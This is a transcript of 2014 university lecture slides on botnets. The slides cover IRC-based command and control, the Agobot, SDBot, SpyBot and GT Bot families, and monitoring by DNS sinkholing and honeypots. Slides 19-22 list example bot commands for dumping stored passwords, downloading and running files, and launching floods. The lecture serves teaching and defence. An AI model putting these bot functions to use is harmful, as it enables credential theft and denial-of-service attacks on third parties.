1 / 26

CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2014

CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2014. Acknowledgement. This lecture uses some contents from the lecture notes from: Dr. Dawn Song: CS161: computer security Richard Wang – SophosLabs: The Development of Botnets

dunavant
Download Presentation

CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2014

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. CAP6135: Malware and Software Vulnerability Analysis BotnetsCliff ZouSpring 2014

  2. Acknowledgement • This lecture uses some contents from the lecture notes from: • Dr. Dawn Song: CS161: computer security • Richard Wang – SophosLabs: The Development of Botnets • Randy Marchany - VA Tech IT Security Lab: Botnets

  3. Botnets • Collection of compromised hosts • Spread like worms and viruses • Once installed, respond to remote commands • A network of ‘bots’ • robot : an automatic machine that can be programmed to perform specific tasks. • Also known as ‘zombies’

  4. Platform for many attacks • Spam forwarding (70% of all spam?) • Click fraud • Keystroke logging • Distributed denial of service attacks • Serious problem • Top concern of banks, online merchants • Vint Cerf: ¼ of hosts connected to Internet

  5. What are botnets used for?

  6. IRC (Internet Relay Chat) based Control

  7. IRC (Internet Relay Chat) based Control

  8. Why IRC? • IRC servers are: • freely available • easy to manage • easy to subvert • Attackers have experience with IRC • IRC bots usually have a way to remotely upgrade victims with new payloads to stay ahead of security efforts

  9. How bad is the problem? • Symantec identified a 400K node botnet • Netadmin in the Netherlands discovered 1-2M unique IPs associated with Phatbot infections. • Phatbot harvests MyDoom and Bagel infected machines. • Researchers in Gtech monitored thousands of botnets

  10. Spreading Problem • Spreading mechanism is a leading cause of background noise • Port 445, 135, 139, 137 accounted for 80% of traffic captured by German Honeynet Project • Other ports • 2745 – bagle backdoor • 3127 – MyDoom backdoor • 3410 – Optix trojan backdoor • 5000 – upnp vulnerability

  11. Most commonly used Bot families • Agobot • SDBot • SpyBot • GT Bot

  12. Agobot • Most sophisticated • 20,000 lines C/C++ code • IRC based command/control • Large collection of target exploits • Capable of many DoS attack types • Shell encoding/polymorphic obfuscation • Traffic sniffers/key logging • Defend/fortify compromised system • Ability to frustrate dissassembly

  13. SDBot • Simpler than Agobot, 2,000 lines C code • Non-malicious at base • Utilize IRC-based command/control • Easily extended for malicious purposes • Scanning • DoS Attacks • Sniffers • Information harvesting • Encryption

  14. SpyBot • <3,000 lines C code • Possibly evolved from SDBot • Similar command/control engine • No attempts to hide malicious purposes

  15. GT Bot • Functions based on mIRC scripting capabilities • HideWindow program hides bot on local system • Basic rootkit function • Port scanning, DoS attacks, exploits for RPC and NetBIOS

  16. Variance in codebase size, structure, complexity, implementation • Convergence in set of functions • Possibility for defense systems effective across bot families • Bot families extensible • Agobot likely to become dominant

  17. Control • All of the above use IRC for command/control • Disrupt IRC, disable bots • Sniff IRC traffic for commands • Shutdown channels used for Botnets • IRC operators play central role in stopping botnet traffic • But a botnet could use its own IRC server • Automated traffic identification required • Future botnets may move away from IRC • Move to P2P communication • Traffic fingerprinting still useful for identification

  18. Host control • Fortify system against other malicious attacks • Disable anti-virus software • Harvest sensitive information • PayPal, software keys, etc. • Economic incentives for botnets • Stresses need to patch/protect systems prior to attack • Stronger protection boundaries required across applications in OSes

  19. Example Botnet Commands • Connection • CLIENT: PASS <password> • HOST : (if error, disconnect) • CLIENT: NICK <nick> • HOST : NICKERROR | CONNECTED • Pass hierarchy info • BOTINFO <nick> <connected_to> <priority> • BOTQUIT <nick>

  20. Example Botnet Commands • IRC Commands • CHANJOIN <tag> <channel> • CHANPART <tag> <channel> • CHANOP <tag> <channel> • CHANKICK <tag> <channel> • CHANBANNED <tag> <channel> • CHANPRIORITY <ircnet> <channel> <LOW/NORMAL/HIGH>

  21. Example Botnet Commands • pstore • Display all usernames/passwords stored in browsers of infected systems • bot.execute • Run executable on remote system • bot.open • Reads file on remote computer • bot.command • Runs command with system()

  22. Example Botnet Commands • http.execute • Download and execute file through http • ftp.execute • ddos.udpflood • ddos.synflod • ddos.phaticmp • redirect.http • redirect.socks

  23. botmaster C&C C&C bot bot bot Current Botnet Control Architecture • More than one C&C server • Spread all around the world

  24. KarstNet sinkhole Botnet Monitor: Gatech KarstNet attacker • A lot bots use Dyn-DNS name to find C&C C&C C&C cc1.com • KarstNet informs DNS provider of cc1.com • Detect cc1.com by its abnormal DNS queries bot bot bot • DNS provider maps cc1.com to Gatech sinkhole (DNS hijack) • All/most bots attempt to connect the sinkhole

  25. Botnet Monitor: Honeypot Spy • Security researchers set up honeypots • Honeypots: deliberately set up vulnerable machines • When compromised, put close monitoring of malware’s behaviors • Tutorial: http://en.wikipedia.org/wiki/Honeypot_%28computing%29 • When compromised honeypot joins a botnet • Passive monitoring: log all network traffic • Active monitoring: actively contact other bots to obtain more information (neighborhood list, additional c&c, etc.) • Representative research paper: • A multifaceted approach to understanding the botnet phenomenon, Abu Rajab, Moheeb and Zarfoss, Jay and Monrose, Fabian and Terzis, Andreas, 6th ACM SIGCOMM conference on Internet measurement (IMC), 2006.

  26. The Future Generation of Botnets • Peer-to-Peer C&C • Polymorphism • Anti-honeypot • Rootkit techniques

More Related